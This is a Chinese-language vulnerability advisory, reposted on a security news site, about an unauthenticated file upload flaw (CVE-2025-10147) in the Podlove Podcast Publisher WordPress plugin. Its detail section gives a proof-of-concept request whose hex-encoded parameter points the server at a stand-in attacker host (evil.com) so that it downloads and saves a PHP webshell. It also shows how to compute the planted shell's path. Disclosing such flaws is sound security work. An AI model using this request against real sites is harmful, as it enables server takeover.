微慑信息网

Podlove Podcast Publisher 漏洞(CVE-2025-10147)

1、描述:
Podlove Podcast Publisher是一款 WordPress的播客发布插件

2、影响:

产品或组件及版本:Podlove Podcast Publisher 版本<=4.2.6

3、细节:

该漏洞源于

\podlove-podcasting-plugin-for-wordpress\lib\model\
image.php约463行的move_as_original_file方法中,未对文件后缀进行验证导致,可导致攻击者无需登录在未授权情况下上传任意文件(包括webshelll)到目标服务器,获取服务器权限。

在未登录状态,直接访问链接:

http://domain/
index.php?podlove_image_cache_url=
68747470733a2f2f6576696c2e636f6d2f746573742e706870&podlove_width=500&podlove_height=0&podlove_crop=0&podlove_file_name=1

即可在网站目录/wp-content/目录下生成:

/cache/podlove/e5/280e279c399dd5a480a4cbf5909d1f/
1_original.php

图片

其中

68747470733a2f2f6576696c2e636f6d2f746573742e706870

hex,转换后为:

图片

而生成的路径:

/e5/375ed26ecd96c193bdb826a52e03fbe7/
1_original.php

/e5/375ed26ecd96c193bdb826a52e03fbe7

podlove_image_cache_url 和podlove_file_name拼接之后的字符串的MD5值处理后的结果:


https://evil.com/test.php1:

图片



1_original.php中的1则为podlove_file_name的值,如果podlove_file_name带点(.)则会被替换为横杆(-);

由此可未授权访问触发SHELL的链接,并推算出shell的地址,进行访问;





赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » Podlove Podcast Publisher 漏洞(CVE-2025-10147)

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫

微信扫一扫

登录

找回密码

注册